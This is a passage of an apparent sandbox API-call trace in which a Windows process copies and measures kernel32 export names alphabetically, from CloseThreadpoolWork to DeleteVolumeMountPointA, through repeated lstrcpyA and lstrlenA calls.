(lpString="CLOSETHREADPOOLWORK") returned 19 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.011] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.011] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.011] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.011] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.011] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.011] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.011] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.011] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.011] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.011] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.011] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.011] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.011] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.011] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.011] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.011] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.012] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.012] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.012] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.012] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.012] lstrlenA (lpString="COPYFILEA") returned 9 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.012] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.012] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.012] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.012] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.012] lstrlenA (lpString="COPYFILEW") returned 9 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.012] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.012] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.012] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.012] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.012] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.012] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.012] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.012] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.012] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.012] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.013] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.013] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.013] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.013] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.013] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.013] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.013] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.013] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.013] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.013] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.013] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.013] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.013] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.013] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.013] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.013] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.013] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.013] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.013] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.014] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.014] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.014] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.014] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.014] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.014] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.014] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.014] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.014] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.014] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.014] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.014] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.014] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.014] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.014] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.014] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.014] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.014] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.014] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.015] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.015] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.015] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.015] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.015] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.015] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.015] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.015] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.015] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.015] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.015] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.015] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.015] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.015] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.016] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.016] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.016] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.016] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.016] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.016] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.016] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.016] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.016] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.016] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.016] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.016] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.016] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.016] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.016] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.016] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.016] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.016] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.016] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.016] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.017] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.017] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.017] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.017] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.017] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.017] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.017] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.017] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.017] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.017] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.017] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.017] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.017] lstrlenA (lpString="DELETEATOM") returned 10 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.017] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.017] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.017] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.017] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.017] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.017] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.017] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.018] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.018] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.018] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.018] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.018] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.018] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, 